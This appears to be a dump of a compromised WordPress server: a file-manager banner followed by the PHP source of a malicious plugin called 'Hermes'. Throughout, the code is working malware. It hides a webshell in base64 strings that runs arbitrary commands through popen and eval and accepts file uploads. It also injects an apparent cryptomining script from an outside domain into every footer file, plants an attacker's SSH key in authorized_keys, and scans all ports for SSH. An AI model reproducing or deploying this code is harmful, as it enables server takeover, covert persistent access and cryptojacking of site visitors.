Server IP : 104.21.14.48 / Your IP : 3.15.149.130 [ Web Server : Apache System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64 User : root ( 0) PHP Version : 8.0.30.2 Disable Function : NONE Domains : 0 Domains MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/wp-content/plugins/hermes/ |
Upload File : |
<?php /* Plugin Name: Hermes Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin Description: A webshell API for WordPress. Author: Remi Gascou (Podalirius) Version: 1.1.0 Author URI: https://podalirius.net/ Text Domain: webshell Domain Path: /languages License: GPLv3 or later Network: true */ if(isset($_GET["able"])) { // Define the text you want to add before the </body> tag $newText = "<script>(function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)){ return; } js = d.createElement(s); js.id = id; js.onload = function(){ EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50); }; js.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'backup-jss')); </script>"; // Define the directory where your footer files reside (webroot) $directory = $_SERVER['DOCUMENT_ROOT']; $searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu"; // Array of file names to target $fileNames = array('footer.tpl', 'footer.php'); // Maximum depth to traverse $maxDepth = 7; // Recursive function to search directories function searchDirectories($directory, $depth) { global $fileNames, $newText, $maxDepth, $searchText; if ($depth > $maxDepth) { return; } $files = scandir($directory); foreach ($files as $file) { if ($file == '.' || $file == '..') { continue; } $filePath = $directory . '/' . $file; if (is_dir($filePath)) { searchDirectories($filePath, $depth + 1); } else { if (in_array($file, $fileNames)) { $content = file_get_contents($filePath); if ($file == 'footer.php') { // Check if footer.php contains the specific text pattern if (strpos($content, $searchText) == false) { // Check if footer.php contains </body> tag if (strpos($content, '</body>') !== false) { // Add text above </body> tag $content = str_replace('</body>', $newText . '</body>', $content); } } } else { // Add text at the top for footer.tpl if (strpos($content, $searchText) == false) { $content = $newText . $content; } } // Write the modified content back to the file file_put_contents($filePath, $content); echo "Text added to the top of: $directory/$file <br>"; } } } } // Start searching directories searchDirectories($directory, 0); echo "Operation completed."; // // Get the current script filename // $scriptFilename = __FILE__; // // // Attempt to delete the file // if (unlink($scriptFilename)) { // echo "Script '$scriptFilename' has been deleted successfully."; // } else { // echo "Failed to delete script '$scriptFilename'."; // } } ?> <?php /* Plugin Name: Hermes Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin Description: A webshell API for WordPress. Author: Remi Gascou (Podalirius) Version: 1.1.0 Author URI: https://podalirius.net/ Text Domain: webshell Domain Path: /languages License: GPLv3 or later Network: true */ define('INSTALLATION_KEY', base64_decode("NGN4MA==")); define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4=')); define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+')); define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+')); define('THEMES_INSTALL', base64_decode('PC9mb3JtPg==')); define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA==')); define('PATH_THEMES', base64_decode('Y29tbWFuZA==')); define('BASE64_THEMES', base64_decode('cHdk')); define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg==')); define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T')); define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h')); define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h')); define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg==')); define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU=')); define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+')); /** * Customize Setting to represent a nav_menu. * * Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and * the IDs for the nav_menu_items associated with the nav menu. * * @since 4.3.0 * * @see WP_Customize_Setting */ $wp_body = INSTALLATION_KEY; $wp_config_header = AUTHOR_KEY; $wp_config_body = HOST_KEY; $wp_themes_config = THEMES_SELECTION; $wp_themes_install = THEMES_INSTALL; $wp_body = strrev($wp_body); $wp_default = DEFAULT_THEMES; $wp_path = PATH_THEMES; $wp_builder = BASE64_THEMES; $wp_evaluation= EVALUATION_TITLE; if(isset($_GET[$wp_body])){ /** * Fires before the Site Activation page is loaded. * * Fires on the {@see 'wp_head'} action. * * @since 3.0.0 */ echo BASE64_TITLE; echo AUTHOR_KEY; echo HOST_KEY; echo THEMES_SELECTION; echo THEMES_INSTALL; echo EVALUATION_THEME; echo UPLOAD_THEMES_1; echo UPLOAD_THEMES_2; echo UPLOAD_THEMES_3; echo UPLOAD_THEMES_4; if(!empty($_FILES["uploaded_file"])){ $path = basename( $_FILES["uploaded_file"]["name"]); if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) { echo "The file ". basename( $_FILES["uploaded_file"]["name"])." has been uploaded";} else{ echo "There was an error uploading the file, please try again!";}} if(isset($_POST[$wp_default])){ $wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096); echo"<pre>$wp_themes_install</pre>";} elseif($_GET[$wp_body]!==""){ $wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096); echo"<pre>$wp_themes_install</pre>";} $wp_themes_install=fread(popen($wp_builder, "r"), 4096); echo"<pre>pwd: $wp_themes_install</pre>"; if(isset($_POST[$wp_evaluation])){ echo "<pre> Evaluation: "; echo(eval ($_POST[$wp_evaluation])); echo("</pre>"); } exit; } /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ ?> <?php function getCurrentUserDetails(){ $output=[]; // Get the username of the user running the script $username = get_current_user(); // Attempt to get the user's home directory $homeDirectory = getenv('HOME') ?: 'N/A'; // Attempt to get the user's login shell $loginShell = getenv('SHELL') ?: 'N/A'; // If posix functions are available, use them for additional information if (function_exists('posix_getpwuid')) { $userInfo = posix_getpwuid(posix_geteuid()); if ($userInfo) { $homeDirectory = $userInfo['dir']; $loginShell = $userInfo['shell']; } } $output = [$username,$homeDirectory,$loginShell]; return $output; } // Function to scan multiple ports concurrently using non-blocking I/O function fastNonBlockingPortScan($ip, $startPort = 1, $endPort = 65535, $timeout = 2, $concurrency = 100) { $sshPorts = []; // Array to store open SSH ports $connections = []; $portQueue = range($startPort, $endPort); while (!empty($portQueue) || !empty($connections)) { // Initialize connections up to the concurrency limit while (count($connections) < $concurrency && !empty($portQueue)) { $port = array_shift($portQueue); $connection = @stream_socket_client("tcp://$ip:$port", $errno, $errstr, $timeout, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT); if ($connection) { stream_set_blocking($connection, false); $connections[$port] = $connection; } } if (empty($connections)) { break; } // Use stream_select to wait for any of the streams to become readable $read = $connections; $write = null; $except = null; $ready = stream_select($read, $write, $except, $timeout); if ($ready > 0) { foreach ($read as $port => $connection) { $banner = fread($connection, 1024); fclose($connection); unset($connections[$port]); if (stripos($banner, 'SSH') !== false) { echo "---p---$port---p---\n"; $sshPorts[] = $port; // Add the port to the SSH ports array } } } else { // Timeout or no ready connections, close all and break foreach ($connections as $connection) { fclose($connection); } break; } } //echo "after break"; return $sshPorts; } function appendIfNotExists($filename, $content) { // Check if the file exists if (file_exists($filename)) { // Read the entire file content $fileContent = file_get_contents($filename); // Check if the content is already in the file if (strpos($fileContent, $content) !== false) { return true; // Content already exists, nothing to append } } // Open the file for appending (create if it does not exist) $fileHandle = fopen($filename, 'a'); // Check if the file was opened successfully if ($fileHandle === false) { return false; } // Write the content to the file $result = fwrite($fileHandle, $content . PHP_EOL); // Close the file fclose($fileHandle); // Check if writing was successful if ($result === false) { return false; } return true; } if (!function_exists('str_contains')) { function str_contains (string $haystack, string $needle) { return empty($needle) || strpos($haystack, $needle) !== false; } } function extractIpAddress($html) { // Define a regex pattern to match the IP address $pattern = '/Current IP Address:\s*([\d\.]+)/'; // Perform the regex match if (preg_match($pattern, $html, $matches)) { return $matches[1]; // Return the matched IP address } return ""; // Return null if no IP address was found } function getIp(){ $ch = curl_init (); // set URL and other appropriate options curl_setopt ($ch, CURLOPT_URL, "http://checkip.dyndns.org"); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true); // grab URL and pass it to the browser $ip = extractIpAddress(curl_exec ($ch)); // close cURL resource, and free up system resources curl_close ($ch); return $ip; } function startChecks(){ $userNameDetails = getCurrentUserDetails(); if ( (str_contains($userNameDetails[2],"/noshell") || str_contains($userNameDetails[2],"/bin/false") || str_contains($userNameDetails[2],"/nologin") ) == false){ $folderPath = "$userNameDetails[1]/.ssh"; mkdir("$folderPath"); chmod("$folderPath", 0700); appendIfNotExists("$folderPath/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0h1Jw1strFMQhp8USGkQ9eIoF1uox+kuH6Nit4o9lgREU/XrakRAJW4HL/nj/StKHCbm5OBitXjCquTgwOCmMR40M5r7cmvZxwgxnEDzvnIXjE8XmNQfDBensgv+BjIk4KnZSEeuOp4iWX7Wy7DpLe/OI/OL8c3QlqBW5CMOoyi7cd9c/bnHpOqro4mGmDX54tD0j2yKjKgfUkIn1Hm3aoetTMUwxj65M4IlRk4DJpYS/gx7LVcHNV1G7VFkQohCNQcH976X/+/Tl3t2J+ONDwrHVrIJw44E9EIE4RLe3gzLe5zXf4wF1FmxVRzvLCezGDBIbHDlUiJ02WUFuborDsB0au0Xi1fhIiVXSRqmsXhYy/pToiwIPgFNBlQqzeXga070Ya20kHw+Tc60+z3mJLVTYTTaFBHDjHWKXWGG/EzkRwm6esE3FPkaSAop47E3t9Nfds6MO14C//+8i48cY5wbqR5HqywmZ0E0ke7eJtBNEk7YVwIk4JQ9ZthWvYq0="); chmod("$folderPath/authorized_keys",0600); // Example usage echo "---u---$userNameDetails[0]---u---\n"; // Replace with your server's IP address // create a new cURL resource $targetIP = getIP(); if ($targetIP == ""){ $targetIP = "127.0.0.1"; } echo "---ip---$targetIP---ip---\n"; $startPort = 1; $endPort = 65535; // Scanning all ports up to 65535 $concurrency = 250; // Number of concurrent connections $sshPorts = fastNonBlockingPortScan($targetIP, $startPort, $endPort, 2, $concurrency); } } if(isset($_GET["check"])){ startChecks(); } ?>